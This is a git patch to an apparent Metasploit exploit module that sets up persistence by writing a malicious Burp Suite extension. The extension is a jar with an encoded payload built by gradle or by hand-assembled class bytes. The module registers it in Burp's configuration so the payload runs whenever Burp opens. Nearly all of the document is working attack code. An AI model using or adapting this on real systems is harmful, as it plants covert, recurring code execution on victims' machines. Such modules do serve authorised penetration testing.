From 3565f89ebc5925d26a25a2edf7ba98ea70476a0e Mon Sep 17 00:00:00 2001 From: h00die Date: Sun, 29 Dec 2024 13:34:53 -0500 Subject: [PATCH] burp extension persistence --- .../multi/local/burp_extension_persistence.rb | 46 ++++++++++++++++--- 1 file changed, 40 insertions(+), 6 deletions(-) diff --git a/modules/exploits/multi/local/burp_extension_persistence.rb b/modules/exploits/multi/local/burp_extension_persistence.rb index 3deebaa67766..21cbd713e8e3 100644 --- a/modules/exploits/multi/local/burp_extension_persistence.rb +++ b/modules/exploits/multi/local/burp_extension_persistence.rb @@ -17,6 +17,10 @@ def initialize(info = {}) info, 'Name' => 'Burp Extension Persistence', 'Description' => %q{ + This module adds a malicious extension to the Burp Suite configuration file. When burp is opened, + the extension will be loaded and the payload will be executed. + + Tested against Burp Suite ???? }, 'License' => MSF_LICENSE, 'Author' => [ @@ -108,7 +112,39 @@ def add_extension(settings_file, extension_location) write_file(settings_file, JSON.pretty_generate(config_contents)) end - def extension(extension_name) + def run_local_gradle_build + # Check if gradle is installed + fails_with(Failure::NotFound, 'Gradle is not installed on this system (not target).') unless system('which gradle > /dev/null 2>&1') + + # Define source and destination directories + src_dir = File.join(Msf::Config.data_directory, 'exploits', 'burp_extension') + temp_dir = Dir.mktmpdir + + # Copy necessary files to the temporary directory + FileUtils.cp_r(File.join(src_dir, 'src'), temp_dir) + FileUtils.cp(File.join(src_dir, 'settings.gradle'), temp_dir) + FileUtils.cp(File.join(src_dir, 'build.gradle'), temp_dir) + + # Modify burpExtension.java + java_file = File.join(temp_dir, 'src', 'burpExtension.java') + text = File.read(java_file) + new_contents = text.gsub('FOOBARBAZ', payload.encoded) + .gsub('Metasploit Payload Extension', datastore['NAME']) + File.open(java_file, 'w') { |file| file.puts new_contents } + + # Run gradle clean build + Dir.chdir(temp_dir) do + system('gradle clean build') + end + + # Check if the jar file was created + jar_file = File.join(temp_dir, 'build', 'libs', 'MetasploitPayloadExtension.jar') + fails_with('Failed to create MetasploitPayloadExtension.jar') unless File.exist?(jar_file) + + File.read(jar_file) + end + + def compiled_extension(extension_name) # somewhat arbitrary line breaks to make it easier to read puts payload.encoded # puts int_to_slash_x_number(extension_name.length, 2) @@ -120,8 +156,7 @@ def extension(extension_name) burp_extension_class << int_to_slash_x_number(extension_name.length, 2) # extension name length burp_extension_class << extension_name # extension name burp_extension_class << "\x0b\x00\x0a\x00\x0b\x07\x00\x0c\x0c\x00\x0d\x00\x0e\x01\x00\x1bburp/IBurpExtenderCallbacks\x01\x00\x10setExtensionName\x01\x00\x15(Ljava/lang/String;)V\x08\x00\x10" - # smaller payloads (400ish in size) don't have this, larger payloads - # like 800 do. not sure why though + # smaller payloads (400ish in size) don't have this byte, larger payloads like 800 do. not sure why though burp_extension_class << "\x01" burp_extension_class << int_to_slash_x_number(payload.encoded.length, 2) # payload length, 2 bytes \xNN\xNN burp_extension_class << payload.encoded # payload @@ -156,7 +191,6 @@ def extension(extension_name) jar = Rex::Zip::Jar.new # build our manifest manually because its only one line and we don't need the extra # lines that build_manifest adds. This more closely implements the gradle build command - # jar.build_manifest jar.add_file('META-INF/', '') jar.add_file('META-INF/MANIFEST.MF', "Manifest-Version: 1.0\r\n\r\n") jar.add_file('burp/', '') @@ -171,11 +205,11 @@ def exploit print_status("Using extension name: #{extension_name}") extension_location = "#{datastore['WritableDir']}/#{extension_name}.jar" vprint_status("Writing malcious extension to disk: #{extension_location}") - write_file(extension_location, extension(extension_name)) + write_file(extension_location, compiled_extension(extension_name)) register_files_for_cleanup(extension_location) vprint_status('Updating config file') add_extension(datastore['CONFIG'], extension_location) - print_good('extension enabled, waiting for Burp to open with the config.') + print_good('Extension enabled, waiting for Burp to open with the config.') end end